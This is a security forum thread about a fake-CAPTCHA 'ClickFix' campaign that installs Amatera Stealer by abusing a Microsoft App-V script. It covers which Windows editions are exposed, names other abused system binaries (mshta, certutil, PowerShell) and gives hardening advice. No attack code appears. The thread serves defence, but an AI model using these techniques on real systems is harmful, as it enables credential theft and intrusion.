New Fake CAPTCHA Scam Abuses Microsoft Tools to Install Amatera Stealer

[Andy Ful]

The attack does not work on Windows Home/Pro.
On other Windows editions, the attack can be blocked like standard ClickFix attacks.

 

[Parkinsond]

The attack does not work on Windows Home/Pro.

Why not?

 

[ForgottenSeer 123960]

The attack does not work on Windows Home/Pro.
On other Windows editions, the attack can be blocked like standard ClickFix attacks.

The primary "Living off the Land" Binary (LOLBin) used in this campaign is SyncAppvPublishingServer.vbs, a legitimate Microsoft script. Its presence on a system determines the initial success of this specific attack vector:

Enterprise, Education, and Server Editions
These versions are highly vulnerable because they include the Application Virtualization (App-V) client and its associated scripts by default.

Windows Pro Edition
While the App-V client is technically part of the OS code for Pro, it is disabled and unstaged in standard installations. Consequently, the script is typically missing from the System32 folder, causing the attack to fail on a default Pro machine.

Windows Home Edition
This edition does not support App-V features and lacks the necessary script entirely, making it naturally resistant to this specific delivery method.

The "ClickFix" Pivot Strategy​

Threat actors behind these "ClickFix" campaigns are highly adaptive. If the target system is a Home or Pro version where the App-V script is absent, the automated social engineering lure is designed to pivot to other common LOLBins that are present on all editions.

mshta.exe
Used to execute remote or local HTML Application (.hta) files.

certutil.exe
Abused to download and decode malicious payloads from remote servers.

PowerShell.exe
Leveraged for direct, often encoded, command execution to bypass simple string-based detection.

Behavioral Redline
Train all users to recognize that no legitimate CAPTCHA will ever require pressing Win + R and pasting code.

Hardening App-V (Enterprise/Education)
If your environment does not require Application Virtualization, use AppLocker or Windows Defender Application Control (WDAC) to explicitly block SyncAppvPublishingServer.vbs.

ASR Rules
Enable Microsoft Defender Attack Surface Reduction (ASR) rules, specifically.

Block Office applications from creating child processes.

Block execution of potentially obfuscated scripts.

Local Verification
You can verify the presence of the malicious proxy script on any machine by running this command in PowerShell:Test-Path "C:\Windows\System32\SyncAppvPublishingServer.vbs"

 

[Andy Ful]

The specific script mentioned in the logs, SyncAppvPublishingServer.vbs, is the primary "Living off the Land" Binary (LOLBin) for this campaign.

Windows Pro & Enterprise
These editions include the App-V client by default.

Not Pro.

 

[ForgottenSeer 123960]

Not Pro.

View attachment 295030

I stand corrected, as I have researched and found While the App-V (Application Virtualization) technology exists within the Windows codebase, the specific script SyncAppvPublishingServer.vbs is only staged and available in Enterprise, Education, and Server editions. On a standard Pro machine, the attack fails because the file simply does not exist in C:\Windows\System32\.